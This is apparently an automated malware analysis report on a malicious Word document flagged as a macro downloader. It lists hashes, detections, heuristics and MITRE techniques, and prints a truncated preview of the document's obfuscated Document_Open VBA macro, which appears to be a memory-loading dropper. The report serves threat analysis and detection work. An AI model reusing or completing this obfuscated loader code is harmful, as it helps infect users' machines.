Office (OLE) malware analysis — malicious · 5209e6d4028b82cd

MALICIOUS

Office (OLE)

235.0 KB Created: 2018-02-28 15:05:00 Authoring application: Microsoft Office Word First seen: 2019-03-10

MD5: 3b338b9fb60218e907da3a90a47354c6 SHA-1: 1dcc82190b3a279e915397de14f8e477a26efee9 SHA-256: 5209e6d4028b82cd1a59b737ea34a69cfa924a0d690c57b52eaeb2d31868d88f

142 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The file contains VBA macros, specifically a Document_Open macro, which is a common technique for malware droppers. The heuristic 'SE_ENABLE_LURE' indicates the document likely prompts the user to enable macros. ClamAV detection confirms its malicious nature as a downloader. The VBA code is heavily obfuscated, but the presence of a Document_Open macro strongly suggests it attempts to download and execute a secondary payload.

Heuristics 5

ClamAV: Doc.Downloader.Macro-6539595-0 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Doc.Downloader.Macro-6539595-0
VBA macros detected medium 1 related finding OLE_VBA_MACROS

Document contains VBA macro code
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Macro/content-enable lure medium SE_ENABLE_LURE

Document instructs the user to enable macros or editing — a common technique used by malware droppers to bypass Office macro security settings
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://ns.adobe.com/xap/1.0/ In document text (OLE body)
- http://www.w3.org/1999/02/22-rdf-syntax-ns#In document text (OLE body)
- http://purl.org/dc/elements/1.1/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/mm/In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceEvent#In document text (OLE body)
- http://ns.adobe.com/xap/1.0/sType/ResourceRef#In document text (OLE body)
- http://ns.adobe.com/photoshop/1.0/In document text (OLE body)
- http://schemas.openxmlformats.org/drawingml/2006/mainIn document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 12547 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	12547 bytes
SHA-256: `45c11bd9fae4876486d9c842cdff92d0a5b7f6afe05b7ca253ba3b72eef8f05d`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function mnemonic(puffing) Dim armadillidium As Byte Dim grandma As Variant Dim learned As Variant Dim cara As Integer #If (77 - 70 + 393 + 80 - 98 + 318) > ((34 - 94 + 380) - (99 - 5 + 446) * 1) And ((16 - 56 + 68) - (123 - 63 - 32)) * 2 < (Win64) Then Dim einstein As Integer Dim permissibly As LongPtr bursitis = 72 - 85 + 21 Dim electrophorus As LongPtr Dim hushedup As Integer Dim convent As Byte Dim glac As LongPtr Dim patrician As Variant introductory = VarPtr(permissibly) cushy = deuce(introductory, VarPtr(puffing) + (102 - 71 - 23), bursitis) #End If #If (99 - 20 + 321 + 12 - 1 + 289) > ((73 - 94 + 341) - (85 - 62 + 517) * 1) And Not ((111 - 61 - 22) - (95 - 100 + 33)) * 2 < (Win64) Then Dim permissibly As Long bursitis = 73 - 53 - 16 Dim electrophorus As Long Dim glac As Long #End If introductory = VarPtr(permissibly) cushy = slumberer(introductory, VarPtr(puffing) + (16 - 46 + 38), bursitis) necropolis = 75 - 95 + 19 electrophorus = 105 - 21 - 84 maggiore = 32 - 111 + 79 glac = 124 - 62 + 9658 cloyment = 13 - 88 + 4171 aves = 115 - 30 - 21 brashness = hydropathic(ByVal necropolis, _ electrophorus, ByVal maggiore, glac, ByVal cloyment, _ ByVal aves) molise = "cesspool" molise = throughput coistril = slumberer(electrophorus, permissibly, 73 - 76 + 5886) burhinidae = 10 + 10 Pmt 0, burhinidae, 38368, 35856, 4 mnemonic = electrophorus End Function Sub undifferentiated() Dim remedial As Byte Dim pachycephala As Byte unproficiency.mariposa.Value = Day(#12/5/2013#) varday = door = "doubloon" afterthought = pound behoof = "conjugate" ononis = "coper" pillion = "caravel" hominem = epicene felt = "rebirth" Set disinfestation = unproficiency.mariposa.SelectedItem bastnasite = 30 + 57 Pmt 0, bastnasite, 32096, 36842, 4 waratah = disinfestation.Name dislodge = 11 - 44 + 7877 miserably = Right(waratah, dislodge) facon = clannishness.blasphemously(miserably) nwill = 24 + 26 Pmt 0, nwill, 36699, 27856, 7 agastache = "carbonated" #If (122 - 113 + 391 + 69 - 85 + 316) > ((3 - 13 + 330) - (77 - 121 + 584) * 1) And ((70 - 22 - 20) - (28 - 92 + 92)) * 2 < (Win64) Then Dim corps As Variant Dim cylindroid As LongPtr Dim parachutist As LongPtr Dim bijouterie As Variant Dim cocoon As LongPtr Dim acquainted As LongPtr Dim forsooth As LongPtr confabulation = 5 - 120 + 2179 #End If #If (94 - 107 + 413 + 24 - 79 + 355) > ((30 - 102 + 392) - (45 - 34 + 529) * 1) And Not ((83 - 126 + 71) - (10 - 108 + 126)) * 2 < (Win64) Then Dim swimming As Long Dim parachutist As Long Dim nonextensile As Byte Dim cylindroid As Long Dim cocoon As Long analysis = 74 - 120 + 827 Dim acquainted As Long Dim forsooth As Long confabulation = analysis + 3459 #End If fifties = 28 - 74 + 46 invariable = "polar" hd = "conceited" herding = 91 - 70 + 4075 flosculi = 10 + 23 Pmt 0, flosculi, 19848, 31252, 2 ironworks = "ascaphidae" gunmetal = "abused" flypaper = "chlorination" hypermedia = "susceptivity" amianthus = 15 + 32 Pmt 0, amianthus, 5828, 45459, 5 wesleyanism = facon blastomycete = "concussion" circulate = "hemiacetal" cylindroid = mnemonic(wesleyanism) breakdown = "asteism" Dim scummy As Byte Dim boswellia As Long cocoon = 84 - 30 - 54 parachutist = cylindroid + confabulation acquainted = 92 - 89 + 201524 forsooth = 88 - 89 + 3501 inconceivability = cyclicity(acquainted, cocoon, parachutist, cocoon, cocoon, cocoon, cocoon) carya = 7 + 1 Pmt 0, carya, 6929, 57519, 5 End Sub Function deuce(immediateness, catlike, crossbencher) Dim barkeeper As String Dim mimium As Long Dim minded As LongPtr Dim hollowware As LongPtr Dim citadel As LongPtr Dim mycrosporidia As String Dim diehard As LongPtr Dim metals As LongPtr throughput = "nonpublic" ... (truncated)

SHA-256: 45c11bd9fae4876486d9c842cdff92d0a5b7f6afe05b7ca253ba3b72eef8f05d

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True




Function mnemonic(puffing)
Dim armadillidium As Byte
Dim grandma As Variant
Dim learned As Variant
Dim cara As Integer
#If (77 - 70 + 393 + 80 - 98 + 318) > ((34 - 94 + 380) - (99 - 5 + 446) * 1) And ((16 - 56 + 68) - (123 - 63 - 32)) * 2 < (Win64) Then
Dim einstein As Integer
Dim permissibly As LongPtr
bursitis = 72 - 85 + 21
Dim electrophorus As LongPtr
Dim hushedup As Integer
Dim convent As Byte
Dim glac As LongPtr
Dim patrician As Variant
introductory = VarPtr(permissibly)
cushy = deuce(introductory, VarPtr(puffing) + (102 - 71 - 23), bursitis)
#End If
#If (99 - 20 + 321 + 12 - 1 + 289) > ((73 - 94 + 341) - (85 - 62 + 517) * 1) And Not ((111 - 61 - 22) - (95 - 100 + 33)) * 2 < (Win64) Then
Dim permissibly As Long
bursitis = 73 - 53 - 16
Dim electrophorus As Long
Dim glac As Long
#End If
introductory = VarPtr(permissibly)
cushy = slumberer(introductory, VarPtr(puffing) + (16 - 46 + 38), bursitis)
necropolis = 75 - 95 + 19
electrophorus = 105 - 21 - 84
maggiore = 32 - 111 + 79
glac = 124 - 62 + 9658
cloyment = 13 - 88 + 4171
aves = 115 - 30 - 21
brashness = hydropathic(ByVal necropolis, _
electrophorus, ByVal maggiore, glac, ByVal cloyment, _
ByVal aves)
molise = "cesspool"

molise = throughput

coistril = slumberer(electrophorus, permissibly, 73 - 76 + 5886)
burhinidae = 10 + 10
 Pmt 0, burhinidae, 38368, 35856, 4

mnemonic = electrophorus
End Function
Sub undifferentiated()
Dim remedial As Byte
Dim pachycephala As Byte
unproficiency.mariposa.Value = Day(#12/5/2013#)
varday = door = "doubloon"
afterthought = pound
behoof = "conjugate"
ononis = "coper"
pillion = "caravel"

hominem = epicene
felt = "rebirth"
Set disinfestation = unproficiency.mariposa.SelectedItem
bastnasite = 30 + 57
 Pmt 0, bastnasite, 32096, 36842, 4

waratah = disinfestation.Name
dislodge = 11 - 44 + 7877
miserably = Right(waratah, dislodge)
facon = clannishness.blasphemously(miserably)
nwill = 24 + 26
 Pmt 0, nwill, 36699, 27856, 7

agastache = "carbonated"
#If (122 - 113 + 391 + 69 - 85 + 316) > ((3 - 13 + 330) - (77 - 121 + 584) * 1) And ((70 - 22 - 20) - (28 - 92 + 92)) * 2 < (Win64) Then
Dim corps As Variant
Dim cylindroid As LongPtr
Dim parachutist As LongPtr
Dim bijouterie As Variant
Dim cocoon As LongPtr
Dim acquainted As LongPtr
Dim forsooth As LongPtr
confabulation = 5 - 120 + 2179
#End If
#If (94 - 107 + 413 + 24 - 79 + 355) > ((30 - 102 + 392) - (45 - 34 + 529) * 1) And Not ((83 - 126 + 71) - (10 - 108 + 126)) * 2 < (Win64) Then
Dim swimming As Long
Dim parachutist As Long
Dim nonextensile As Byte
Dim cylindroid As Long
Dim cocoon As Long
analysis = 74 - 120 + 827
Dim acquainted As Long
Dim forsooth As Long
confabulation = analysis + 3459
#End If
fifties = 28 - 74 + 46
invariable = "polar"
hd = "conceited"
herding = 91 - 70 + 4075
flosculi = 10 + 23
 Pmt 0, flosculi, 19848, 31252, 2

ironworks = "ascaphidae"
gunmetal = "abused"
flypaper = "chlorination"
hypermedia = "susceptivity"
amianthus = 15 + 32
 Pmt 0, amianthus, 5828, 45459, 5

wesleyanism = facon
blastomycete = "concussion"
circulate = "hemiacetal"
cylindroid = mnemonic(wesleyanism)
breakdown = "asteism"
Dim scummy As Byte
Dim boswellia As Long
cocoon = 84 - 30 - 54
parachutist = cylindroid + confabulation
acquainted = 92 - 89 + 201524
forsooth = 88 - 89 + 3501
inconceivability = cyclicity(acquainted, cocoon, parachutist, cocoon, cocoon, cocoon, cocoon)
carya = 7 + 1
 Pmt 0, carya, 6929, 57519, 5

End Sub

Function deuce(immediateness, catlike, crossbencher)
Dim barkeeper As String
Dim mimium As Long
Dim minded As LongPtr
Dim hollowware As LongPtr
Dim citadel As LongPtr
Dim mycrosporidia As String
Dim diehard As LongPtr
Dim metals As LongPtr
throughput = "nonpublic"
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.